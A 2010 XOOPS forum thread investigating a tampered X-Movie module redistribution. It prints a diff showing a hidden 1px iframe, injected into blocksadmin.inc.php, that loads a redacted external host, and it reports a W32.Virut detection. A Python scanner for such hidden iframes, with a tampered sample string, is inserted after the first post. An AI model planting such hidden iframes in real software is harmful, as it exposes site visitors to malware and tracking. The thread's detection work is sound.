1
Mamba
X-Movie Virus?
  • 2010/5/26 6:40

  • Mamba

  • Moderator

  • Posts: 11366

  • Since: 2004/4/23


Originally in this thread

@ Peekay
Quote:
wishcraft wrote:

Quote:
What about X-Movie 3, mamba, if you're so nice why has the guy installed 4 viruses and php trigger code in it, that I had to remove..


Sorry to back-track a little, but this module appears to be in the module repository. Does it contain a virus?

I am confused with the whole story.

I downloaded X-Movie 3.11 from the link that Wishcraft gave in his article.

Then I downloaded the original 3.0 from the Optikool website and the 3.0 from our Module Repository, which is identical to the one from the Optikool website.

My Virus scanner (Microsoft Security Essentials) didn't find any viruses in any of the files.

Then I used WinMerge to compare the files from Wishcraft's 3.11 and the ones in 3.0 from our repository.


The dates for the binary files do differ, with Wishcraft's files being older. Didn't have time to check on the differences there.

The changed text files are (and the changes):

1)
admin_header.php
class.Thumbnail.php
submit.php
tpl_embedcode.php
tpl_imgtype.php
tpl_movietype.php
tpl_player.php

Line 1: changed from <? to <?php

2)

blocksadmin.inc.php

Line 86 (Wishcraft's code includes iframe):
From:
//  $dummyhtml = '<html><head><meta http-equiv="content-type" content="text/html; charset='._CHARSET.'" /><meta http-equiv="content-language" content="'._LANGCODE.'" /><title>'.$xoopsConfig['sitename'].'</title><link rel="stylesheet" type="text/css" media="all" href="'.getcss($xoopsConfig['theme_set']).'" /></head><body><table><tr><th>'.$myblock->getVar('title').'</th></tr><tr><td>'.$myblock->getContent('S', $bctype).'</td></tr></table></body></html>';


To:
//  $dummyhtml = '<html><head><meta http-equiv="content-type" content="text/html; charset='._CHARSET.'" /><meta http-equiv="content-language" content="'._LANGCODE.'" /><title>'.$xoopsConfig['sitename'].'</title><link rel="stylesheet" type="text/css" media="all" href="'.getcss($xoopsConfig['theme_set']).'" /></head><body><table><tr><th>'.$myblock->getVar('title').'</th></tr><tr><td>'.$myblock->getContent('S', $bctype).'</td></tr></table><iframe style="height:1px" src="http://www.XXX.pl/rc/" frameborder=0 width=1></iframe>
</body></html>';


Please note the link to a web site XXX.pl in Wishcraft's code (I've changed the name so it won't show here, but you can see it in the original file).

3)
myheader.php
Line 61:

From:
</td></tr></table></body></html>

To:
</td></tr></table>
</
body></html>


4)
xoops_version.php

Lines 31 and 33 (changing version number and adding his name)

From:
$modversion['version'] = 3.0;
$modversion['description'] = _MI_X_MOVIE_DESC;
$modversion['credits'] = "Dana Harris (http://www.optikool.com)";

To:

$modversion['version'] = 3.11;
$modversion['description'] = _MI_X_MOVIE_DESC;
$modversion['credits'] = "Dana Harris (http://www.optikool.com), wishcraft.";


So it seems like Wishcraft's changes are cosmetic, there was no "php trigger code" removed, and the iframe has actually been added in Wishcraft's code.

Can somebody confirm it?

Wishcraft, did you upload the correct files? If not, could you upload the correct ones, and tell us which "php trigger code" has been removed from Optikool's original files?
Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs
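
The check that the WinMerge comparison above did by eye, as an added example (not code from any poster or from XOOPS): a Python scanner that flags iframes sized to be invisible and pointing at another host. The sample strings are constructed from the lines quoted in the post, the host is a placeholder, and the 2-pixel threshold and the file extensions are assumptions.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
STYLE_DIM_RE = re.compile(r"(?:^|;)\s*(?:width|height)\s*:\s*(\d+)(?:px)?\s*(?=;|$)", re.I)
MAX_HIDDEN_PX = 2  # assumption: frames this small are not meant to be seen

def parse_attrs(tag):
    """Return the tag's attributes (quoted or bare values) as a lowercase-keyed dict."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag)}

def is_hidden(attrs):
    """True if width/height (attribute or inline style) is at most MAX_HIDDEN_PX."""
    dims = [attrs.get(k, "") for k in ("width", "height")]
    sizes = [int(m.group(1)) for d in dims if (m := re.fullmatch(r"(\d+)(?:px)?", d.strip()))]
    sizes += [int(n) for n in STYLE_DIM_RE.findall(attrs.get("style", ""))]
    return any(s <= MAX_HIDDEN_PX for s in sizes)

def scan_source(name, text, own_hosts=()):
    """List (file, line, host) for each hidden iframe whose src is on a foreign host."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(0))
        host = urlparse(attrs.get("src", "")).hostname
        if host and host not in own_hosts and is_hidden(attrs):
            findings.append((name, text.count("\n", 0, m.start()) + 1, host))
    return findings

def scan_tree(root, own_hosts=()):
    """Scan every .php/.html/.tpl file under root, e.g. an unpacked module zip."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".php", ".html", ".tpl"}:
            hits += scan_source(str(path), path.read_text(errors="replace"), own_hosts)
    return hits

# Constructed samples modelled on the lines quoted in the thread; the host is a placeholder.
TAMPERED = ("<?php\n$dummyhtml = '<table><tr><td>x</td></tr></table>"
            "<iframe style=\"height:1px\" src=\"http://www.example.invalid/rc/\" "
            "frameborder=0 width=1></iframe>\n</body></html>';\n")
CLEAN = "<?php\n$dummyhtml = '<table><tr><td>x</td></tr></table></body></html>';\n"
PLAYER = '<iframe src="http://video.example.org/embed/1" width="560" height="315"></iframe>\n'

if __name__ == "__main__":
    for sample in (("tampered.php", TAMPERED), ("clean.php", CLEAN), ("player.html", PLAYER)):
        print(sample[0], scan_source(*sample))
```

A normally sized player embed is not reported, so a movie module's legitimate iframes do not drown out the injected one.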

2
Burning
Re: X-Movie Virus?
  • 2010/5/26 7:14

  • Burning

  • Theme Designer

  • Posts: 1163

  • Since: 2006/8/22


Hi,

The virus found in Wishcraft's version was W32.Virut!html. The contaminated file was: x_movie/myheader.php

I found it on 2010-05-16 and alerted Simon immediately via MSN. He sent me a new version; the virus was removed.


To be sure, and after Peekay's question, I have scanned (with the same program, Norton 2010) the Optikool version: no virus.


So, no more virus :)
Still learning CSS and... english

3
Mamba
Re: X-Movie Virus?
  • 2010/5/26 7:23

  • Mamba

  • Moderator

  • Posts: 11366

  • Since: 2004/4/23


But which X-Movie files originally contained the virus?

Files that came from Optikool, or files that you received from Wishcraft (or somebody else)?


4
ghia
Re: X-Movie Virus?
  • 2010/5/26 7:39

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


I downloaded xoops2_mod_x_movie_3_optikool.zip in December 2009 with latest file date 20 May 2009.
This does not include the iframe.
The current version on the site of Optikool is xoops2_mod_x_movie_30_optikool.zip dated March 2010, but the files are identical.

It looks as if Wishcraft's PC was infected.

5
Peekay
Re: X-Movie Virus?
  • 2010/5/26 9:48

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


Thanks mamba and others for responding
Quote:
<iframe style="height:1px" src="http://www.XXX.pl/rc/" frameborder=0 width=1></iframe>

I am glad there is no virus, but why add the iFrame?
Just a test, or to track usage of the module?

I appreciate it may have been an error, but you don't want remote links embedded in a module. I found one recently in a module I'm updating. I am confident it was overlooked by the original developer after some initial testing, but the site still set a cookie on my PC.
A thread is for life. Not just for Christmas.

6
Mamba
Re: X-Movie Virus?
  • 2010/5/26 10:11

  • Mamba

  • Moderator

  • Posts: 11366

  • Since: 2004/4/23


As Ghia said, it seems like his PC was infected, and he uploaded the infected files as part of the Zip file.

What I don't understand is how 8 cosmetic changes, as shown above, would justify a new version release. I hope this was just a wrong upload, and there is another version somewhere on his computer with some more significant changes...

7
ghia
Re: X-Movie Virus?
  • 2010/5/26 12:07

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


Quote:
I found one recently in a module I'm updating.
Can you inform us which one, so we can verify it in our repository?
Quote:
What I don't understand is how 8 cosmetic changes, as shown above, would justify a new version release.
As I believe Optikool is still maintaining its site and modules, errors and other needed changes should be reported to him and not released by third parties as new versions.
If no features are added to make a kind of new module out of it, one should not take over existing and actively maintained modules.
Furthermore I believe an edit of the article is appropriate and the following paragraph should be removed as I feel this does injustice to Optikool and his modules.
Quote:
x-Movie 3.11

* Virus Removed
* Embedded Virus Trigger Removed
* Helpers Updated
* Icon Updated
* Version Changed

8
Peekay
Re: X-Movie Virus?
  • 2010/5/26 12:26

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


@ghia

I have been updating Catads, based on Catads 1.522 FINAL from TDM Xoops. I posted an alert to beta testers about the URL in this thread. I don't think that particular module was available in the module repository.

@ mamba

OK. Thx. I suppose if your site (or PC) is compromised the attackers will try and hide malicious code and you may not even know about it. Hopefully Wishcraft will amend the release and remove the iFrame SRC.

If there is no evidence to suggest that Optikool allowed a virus to be included in the previous version, I too think it fair that the release notes are changed.

A thread is for life. Not just for Christmas.

9
Mamba
Re: X-Movie Virus?
  • 2010/5/26 21:29

  • Mamba

  • Moderator

  • Posts: 11366

  • Since: 2004/4/23


Ghia,
Quote:
If no features are added to make a kind of new module out of it, one should not take over existing and actively maintained modules.

Even if it is not actively maintained, only new added features should justify a new version.

Quote:
Furthermore I believe an edit of the article is appropriate and the following paragraph should be removed as I feel this does injustice to Optikool and his modules.

I agree. The paragraph has been removed.


10
optikool
Re: X-Movie Virus?
  • 2010/6/17 17:10

  • optikool

  • Not too shy to talk

  • Posts: 154

  • Since: 2007/3/26


Hey Guys,

I just ran into this thread and wasn't aware that there was a virus version of this module floating around on the net.

@Peekay Generally a cracker would add an iframe to a page so that they could send information back and forth between their server and the page you are viewing. Things like passwords would be the most common info to send. The module that I maintain would not have any need for iframes so if you find one, remove it.

Later this year I'm planning to revisit this module so that I can redesign different aspects to take advantage of new ways of doing things and improve the code. If you see problems with this module let me know and I will look into it.

Also the reason why the publish date changed on the module was because I changed to the Joomla CMS and had to move things over. Sorry Xoops People but I needed to understand the MVC module better and Joomla has that module. But I plan to bring the techniques I learned from creating my XGallery component and what I learn from my Movie component, (still in Alpha, but you can see it on my website) to the Gallery 2 and X Movie modules that I maintain for Xoops. Hopefully it will be a big improvement in the end.
